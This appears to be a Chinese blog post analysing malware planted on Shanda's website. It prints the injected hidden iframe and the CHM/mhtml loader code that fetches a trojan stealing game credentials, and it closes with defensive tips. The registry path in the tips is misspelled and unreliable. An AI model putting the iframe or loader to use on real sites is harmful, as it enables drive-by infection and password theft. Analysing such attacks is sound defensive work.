7.16龙哥给了我一个rar的压缩包，说是盛大给黑的截图以及一些相关的东西，
叫我分析一下，我见也没事做，也就接下来这个任务了。
解压后的文件有4个，分别是poptang.compop.htm，盛大.bmp 盛大1.htm，pop.chm
bmp的是抓图，先看看盛大1.htm，猜了一下，去问问了龙，证实是骇客们入侵了盛大的
网站后，估计是利用asp木马来编辑文件，在网页中插入
<td align="center"><strong><iframe src="pop.htm" width="0" height="0"><font color="#FF0000"><br>
这样，只要受害者一访问网站，就会自动去访问pop.htm，我们来看看pop.htm
pop.htm已经给改名为poptang.compop.htm了，主要的代码如下

<textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!${path}/pop.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf(pop.htm))));
</script>

主要是运行下载了的pop.chm，而且这个pop.chm很明显，就是最近颇为流行的chm木马了，我打开那个CHM文件，打开这个文件的下一个
页面，立刻提示下载一个名为test.exe的文件，呵呵，估计这个才是我们今天重点要分析的对象，用侦壳工具查看了一下，发现不出是
什么加的壳，只好用winhex打开看看，不过却发现有aspack字样，相信各位也和我一样以为是aspack的壳吧，没想到测试了几个专用的
脱壳工具后，才发现不行，只好作罢。正在发愁的时候刚好见到好友kcarhc上来了，也正是黑基以前的血紫狂刀，叫他帮我脱一下壳，
没想到他却说是telock加的壳，晕死了。叫他脱完壳发给我，没想到他顺手也帮我反汇编了，郁闷，我还大显身手一次。
直接说出那个木马的功能吧，盗密码是肯定的了，好想是用service@263.net这个e-mail来发送，主题为 录取通知书，该木马具有以下功能

记录受害者的电脑的传奇的：
传奇登录
登录
发送时间
服务器
附加信息
计算机名
角色
密码
物品信息
用户名
区域
还会自动搜索一下的安全软件来终止它。
噬菌
天网防火墙个人版
天网防火墙企业版
木马克星

的确够狠，不过功能却是一般，下面我们说说如何防止这类木马。
1，不要以为装个杀毒软件就没事了，我可是把那个木马下载后，以及就算脱壳
用诺顿来扫描都提示没有发现病毒，我个人就比较建议或者推荐要及时更新windows的补丁
2，打开注册表，把HKEY_CURRENT_USER\software\microsofr\windows\current version\internetsettings\zone\0的1004项的值由
原来的0改成16进制的3.